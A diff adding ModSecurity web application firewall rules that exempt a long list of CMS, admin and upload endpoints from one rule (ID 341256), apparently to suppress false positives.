+SecRule REQUEST_FILENAME "/admin/write-post\.php" "phase:2,id:94823,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/website/beheer/edit\.php" "phase:2,id:94824,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/potenzen_1_formmailer\.php" "phase:2,id:94825,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/catalogusbijwerken\.php" "phase:2,id:94826,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livechat/server\.php" "phase:2,id:94827,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_updatemedia\.php" "phase:2,id:94828,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/afg_img_rsz\.php" "phase:2,id:94829,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/pagina_edit\.php" "phase:2,id:94830,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/resource/index\.php" "phase:2,id:94831,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/index\.php" "phase:2,id:94832,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/getxml\.php" "phase:2,id:94833,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax-tab\.php" "phase:2,id:94834,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:94835,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livechat/mobile/chat\.php" "phase:2,id:94836,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/soap\.hsp" "phase:2,id:94837,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailman/admindb/*" "phase:2,id:94838,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/save\.php" "phase:2,id:94839,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/sort_edit\.php" "phase:2,id:94840,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/geweest\.php" "phase:2,id:94841,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/project/project_item\.php" "phase:2,id:94842,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/pdfjs-viewer-shortcode/web/viewer\.php" "phase:2,id:94843,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/process_submission\.php" "phase:2,id:94844,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax-upgradetab\.php" "phase:2,id:94845,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/updatemail\.php" "phase:2,id:94846,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/toevoegen_gemee\.php" "phase:2,id:94847,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms_gemeentetiel/" "phase:2,id:94848,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/deleteblogui\.php" "phase:2,id:94849,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/check_mandatory_fields\.php" "phase:2,id:94850,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/assets/components/migx/connector\.php" "phase:2,id:94851,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administration/modifier/formulaire\.php" "phase:2,id:94852,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:94853,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit_config\.php" "phase:2,id:94854,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admineditevent\.php" "phase:2,id:94855,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/article_edit\.php" "phase:2,id:94856,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/serendipity_admin\.php" "phase:2,id:94857,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upload_resize\.php" "phase:2,id:94858,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/main/php/editor\.php" "phase:2,id:94859,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/scp/canned\.php" "phase:2,id:94860,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/scp/tickets\.php" "phase:2,id:94861,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/scp/settings\.php" "phase:2,id:94862,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/didwegetthiswrong\.php" "phase:2,id:94863,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/config_payments_form\.php" "phase:2,id:94864,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/v2/edit\.php" "phase:2,id:94865,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/b/ss/appleusstartpage/" "phase:2,id:94866,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/script-youtube-bg\.php" "phase:2,id:94867,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm_vsz/servert_up\.php" "phase:2,id:94868,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/smb/web/web-server-settings/" "phase:2,id:94869,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/smb/web/edit/" "phase:2,id:94870,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajaxupload\.php" "phase:2,id:94871,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajaxupload2\.php" "phase:2,id:94872,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/searchreplacedb2\.php" "phase:2,id:94873,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/static/ajax\.php" "phase:2,id:94874,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/js/tiny_mce/plugins/filemanager/upload\.php" "phase:2,id:94875,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tools/payment_methods\.php" "phase:2,id:94876,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sitesetup\.php" "phase:2,id:94877,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifybloguim\.php" "phase:2,id:94878,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addeditartikel\.php" "phase:2,id:94879,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/load1pdf\.php" "phase:2,id:94880,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/_cmsms/admin/moduleinterface\.php" "phase:2,id:94881,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage/ci_car_f\.php" "phase:2,id:94882,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/saveedititem\.php" "phase:2,id:94883,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:94884,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livesupport/server\.php" "phase:2,id:94885,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/scripts/process_submission\.php" "phase:2,id:94886,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/package_add_result\.php" "phase:2,id:94887,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ee-admin\.php" "phase:2,id:94888,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fulladmin/configproducts\.php" "phase:2,id:94889,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/product_options\.json\.php" "phase:2,id:94890,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/supportannouncements\.php" "phase:2,id:94891,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fixtures_update\.php" "phase:2,id:94892,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/private\.php" "phase:2,id:94893,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/vba_gallery_admin\.php" "phase:2,id:94894,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/multitv\.connector\.php" "phase:2,id:94895,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e_editwrite\.php" "phase:2,id:94896,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e_date\.php" "phase:2,id:94897,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dnsmanagement\.php" "phase:2,id:94898,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/clientarea\.php" "phase:2,id:94899,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thumbnails\.php" "phase:2,id:94900,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/stats\.php" "phase:2,id:94901,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/agreement_edit\.php" "phase:2,id:94902,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/process/processdb\.php" "phase:2,id:94903,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mdeploy\.php" "phase:2,id:94904,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/themify/img\.php" "phase:2,id:94905,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/worldpay\.php" "phase:2,id:94906,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/parsechecker\.php" "phase:2,id:94907,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_edit\.php" "phase:2,id:94908,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/content\.php" "phase:2,id:94909,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/xoops/configproducts\.php" "phase:2,id:94910,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/engine/index\.php" "phase:2,id:94911,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/derefer\.php" "phase:2,id:94912,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/change_it\.php" "phase:2,id:94913,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/secure/moveissue\.jspa" "phase:2,id:94914,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/configaddonmods\.php" "phase:2,id:94915,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit_menu\.php" "phase:2,id:94916,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/s/process\.php" "phase:2,id:94917,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/flash/gate\.php" "phase:2,id:94918,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/multimediasave\.do" "phase:2,id:94919,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/restaurant\.php" "phase:2,id:94920,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugins\.php" "phase:2,id:94921,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/item\.php" "phase:2,id:94922,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/components/com_avchat3/chat/wget\.php" "phase:2,id:94923,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/securimage_play\.swf" "phase:2,id:94924,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/frontpageupdate\.php" "phase:2,id:94925,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/parsechecker\.php" "phase:2,id:94926,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/document_general\.php" "phase:2,id:94927,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/lib/exe/ajax\.php" "phase:2,id:94928,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quickview\.aspx" "phase:2,id:94929,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:94930,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/updatepage\.php" "phase:2,id:94931,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/widget_engine\.php" "phase:2,id:94932,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/v2_news_engine\.php" "phase:2,id:94933,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_routines\.php" "phase:2,id:94934,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cmd/pagina\.php" "phase:2,id:94935,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/advcp/" "phase:2,id:94936,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0101_change_text\.php" "phase:2,id:94937,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0104_dupicate\.php" "phase:2,id:94938,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0101_change_text\.php" "phase:2,id:94939,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0104_duplicate\.php" "phase:2,id:94940,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0101_change\.php" "phase:2,id:94941,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0101_change_news\.php" "phase:2,id:94942,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/reviews/uploadproduct\.php" "phase:2,id:94943,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/redaxo/index\.php" "phase:2,id:94944,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:94945,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/property-details\.php" "phase:2,id:94946,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/artikel/" "phase:2,id:94947,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editieren_grunddaten\.php" "phase:2,id:94948,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contao/main\.php" "phase:2,id:94949,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/seo-report\.php" "phase:2,id:94950,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/site_links\.php" "phase:2,id:94951,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/network/themes\.php" "phase:2,id:94952,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/previewtemplate\.php" "phase:2,id:94953,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/distributors/edit\.php" "phase:2,id:94954,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/deref\.php" "phase:2,id:94955,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/gr_radiostatus_panel/" "phase:2,id:94956,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3/mod\.php" "phase:2,id:94957,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifyeventui\.php" "phase:2,id:94958,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifyeventuim\.php" "phase:2,id:94959,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/deleteeventui\.php" "phase:2,id:94960,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/deleteeventuim\.php" "phase:2,id:94961,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifyblogui\.php" "phase:2,id:94962,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifybloguim\.php" "phase:2,id:94963,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bug_update\.php" "phase:2,id:94964,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/func/get-members\.php" "phase:2,id:94965,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/update_page\.php" "phase:2,id:94966,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/abf-db\.php" "phase:2,id:94967,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/checkout_yourinfo\.php" "phase:2,id:94968,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adminhandler\.php" "phase:2,id:94969,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sadmin/" "phase:2,id:94970,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/editcentre\.php" "phase:2,id:94971,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/content/widget" "phase:2,id:94972,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-change_domain\.php" "phase:2,id:94973,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pagetext/edit\.php" "phase:2,id:94974,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/actueel\.php" "phase:2,id:94975,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/cws-pb/" "phase:2,id:94976,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/public_file_edit\.php" "phase:2,id:94977,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editgall\.php" "phase:2,id:94978,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod/quiz/" "phase:2,id:94979,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/integration/service\.php" "phase:2,id:94980,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/create_question\.php" "phase:2,id:94981,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wpfb-ajax\.php" "phase:2,id:94982,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/branding\.php" "phase:2,id:94983,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jackbox_social\.php" "phase:2,id:94984,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/customize\.php" "phase:2,id:94985,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/blog/import" "phase:2,id:94986,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/system/ajax" "phase:2,id:94987,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/prodedit\.php" "phase:2,id:94988,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cometchat/admin/" "phase:2,id:94989,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/dada/plugins/bridge\.cgi" "phase:2,id:94990,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/addcentre\.php" "phase:2,id:94991,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_orders_tax\.php" "phase:2,id:94992,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/whmadmcp/addonmodules\.php" "phase:2,id:94993,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "property-edit-handler\.php" "phase:2,id:94994,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/admin_settings_save\.php" "phase:2,id:94995,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/send\.email\.do\.php" "phase:2,id:94996,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/homepage\.php" "phase:2,id:94997,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/backwpup/job/job_run\.php" "phase:2,id:94998,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/project/install/handle_ajax" "phase:2,id:94999,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cometchat_send\.php" "phase:2,id:95000,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/social_slider_panel/admin\.php" "phase:2,id:95001,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
